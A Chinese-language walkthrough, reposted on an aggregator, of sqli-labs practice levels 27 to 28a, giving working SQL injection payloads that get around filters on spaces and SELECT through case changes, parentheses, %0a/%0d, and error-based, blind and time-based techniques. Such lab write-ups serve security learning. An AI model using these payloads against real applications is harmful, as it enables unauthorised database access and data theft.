第二十七關：

這關禁用了空格和select，空格還是可以使用（）代替，select發現可以大小寫繞過

輸入?id=1'||extractvalue(1,concat(0x5c,(selEct(group_concat(schema_name))from(information_schema.schemata))))||'1'='1

這里還有個問題就是，空格被過濾了，貌似不能使用聯合注入了。網上有人說可以使用%0a ，是可以的

?

還可以使用內聯注釋的/*! content */? 但是這關過濾了/*? 所以不行，不過我在第一關中嘗試了 是可以的

?

第二十七a關：

和第二十七關一樣，只是需要將報錯注入改成盲注。

輸入?id="||substr((seLEct(user())),1,1)="r

?

?使用延時的盲注如下

輸入：?id="||if((substr((seLEct(user())),1,1)="r"),sleep(1),1)||"2"="1

?

第二十八關：

先看源碼

\s代表先去掉多有空格，報錯%0a，/i表示忽略大小寫。

可以輸入?id=0')union(select%0d1,database(),'3

?

第二十八a關：

比二十八關的過濾還少些，就不多說了。直接使用上面的expload就行。

轉載于:https://www.cnblogs.com/jinqi520/p/9573210.html

總結

以上是生活随笔為你收集整理的sqli-labs(十二)（union以及select的过滤）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。